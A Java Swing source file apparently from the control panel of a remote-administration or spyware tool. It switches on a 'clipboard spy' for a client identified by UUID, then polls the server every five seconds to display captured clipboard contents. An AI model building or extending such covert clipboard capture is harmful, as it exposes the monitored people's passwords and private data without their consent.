/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package ui_server;

import Comman.ConnectionServer;
import Comman.LOCAL_KEYS;
import Comman.SERVER_KEYS;
import Comman.Tool;
import java.util.HashMap;
import java.util.ResourceBundle;
import javax.swing.DefaultListModel;

/**
 *
 * @author abaza
 */
public final class frmClipbord extends javax.swing.JInternalFrame {

    SERVER_KEYS Server_Var = new SERVER_KEYS();
    LOCAL_KEYS Local_Var = new LOCAL_KEYS();
    private Comman.ConnectionServer Server = null;
    private static final Comman.Tool Tool = new Tool();
    public static ResourceBundle local = Tool.GetLocal();

    String CUUID;
    DefaultListModel model;

    /**
     * Creates new form frmClipbord
     *
     * @param uuid
     */
    Thread timer = null;

    public frmClipbord(String uuid) {
        initComponents();
        Server = new ConnectionServer();
        model = new DefaultListModel();
        this.CUUID = uuid;
        init(1);
        get();
        timer = new Thread(new Runnable() {
            @Override
            public void run() {
                while (true) {
                    get();
                    try {
                        Thread.sleep(5000);
                    } catch (InterruptedException ex) {
                    }
                }
            }
        });
        timer.start();
    }

    void get() {
        String[][] Data = {
            {Server_Var.TYPE_COMMENT, Server_Var.GET_CLIPBORD_SPY},
            {Local_Var.CLIPBORD_CUUID, CUUID}
        };
        HashMap<String, String> Ret = Server.Contaner(Data);
        if (Server.DoneOrNot(Ret)) {
            for (int i = 0; i <= Ret.size() - 1; i++) {
                String De = Ret.get(String.valueOf(i));
                model.addElement(De);
            }
            jList1.removeAll();
            jList1.setModel(model);
        }
    }

    void init(int Key) {
        String[][] Data = new String[][]{
            {Server_Var.TYPE_COMMENT, Server_Var.SET_CLIPBORD_SPY},
            {Local_Var.TASKS_CUUID, CUUID},
            {Local_Var.TASKS_CLIPBORD, String.valueOf(Key)}
        };

        if (Server.DoneOrNot(Server.Contaner(Data))) {
            System.out.println("Open Clipbord");
        } else {
            System.out.println("Error Database in Clipbord");
        }
    }

    /**
     * This method is called from within the constructor to initialize the form.
     * WARNING: Do NOT modify this code. The content of this method is always
     * regenerated by the Form Editor.
     */
    @SuppressWarnings("unchecked")
    // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
    private void initComponents() {

        jScrollPane2 = new javax.swing.JScrollPane();
        jList1 = new javax.swing.JList();
        jTextField1 = new javax.swing.JTextField();

        setClosable(true);
        addInternalFrameListener(new javax.swing.event.InternalFrameListener() {
            public void internalFrameOpened(javax.swing.event.InternalFrameEvent evt) {
            }
            public void internalFrameClosing(javax.swing.event.InternalFrameEvent evt) {
                formInternalFrameClosing(evt);
            }
            public void internalFrameClosed(javax.swing.event.InternalFrameEvent evt) {
            }
            public void internalFrameIconified(javax.swing.event.InternalFrameEvent evt) {
            }
            public void internalFrameDeiconified(javax.swing.event.InternalFrameEvent evt) {
            }
            public void internalFrameActivated(javax.swing.event.InternalFrameEvent evt) {
            }
            public void internalFrameDeactivated(javax.swing.event.InternalFrameEvent evt) {
            }
        });

        jList1.setModel(new javax.swing.AbstractListModel() {
            String[] strings = { "Item 1", "Item 2", "Item 3", "Item 4", "Item 5" };
            public int getSize() { return strings.length; }
            public Object getElementAt(int i) { return strings[i]; }
        });
        jList1.setSelectionMode(javax.swing.ListSelectionModel.SINGLE_SELECTION);
        jList1.addListSelectionListener(new javax.swing.event.ListSelectionListener() {
            public void valueChanged(javax.swing.event.ListSelectionEvent evt) {
                jList1ValueChanged(evt);
            }
        });
        jScrollPane2.setViewportView(jList1);

        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
        getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 736, Short.MAX_VALUE)
            .addComponent(jTextField1)
        );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(layout.createSequentialGroup()
                .addComponent(jScrollPane2, javax.swing.GroupLayout.PREFERRED_SIZE, 467, javax.swing.GroupLayout.PREFERRED_SIZE)
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
        );

        pack();
    }// </editor-fold>//GEN-END:initComponents

    private void jList1ValueChanged(javax.swing.event.ListSelectionEvent evt) {//GEN-FIRST:event_jList1ValueChanged
        jTextField1.setText((String) jList1.getSelectedValue());
    }//GEN-LAST:event_jList1ValueChanged

    private void formInternalFrameClosing(javax.swing.event.InternalFrameEvent evt) {//GEN-FIRST:event_formInternalFrameClosing
        if (timer != null) {
            timer = null;
            init(0);
        }
    }//GEN-LAST:event_formInternalFrameClosing


    // Variables declaration - do not modify//GEN-BEGIN:variables
    private javax.swing.JList jList1;
    private javax.swing.JScrollPane jScrollPane2;
    private javax.swing.JTextField jTextField1;
    // End of variables declaration//GEN-END:variables
}
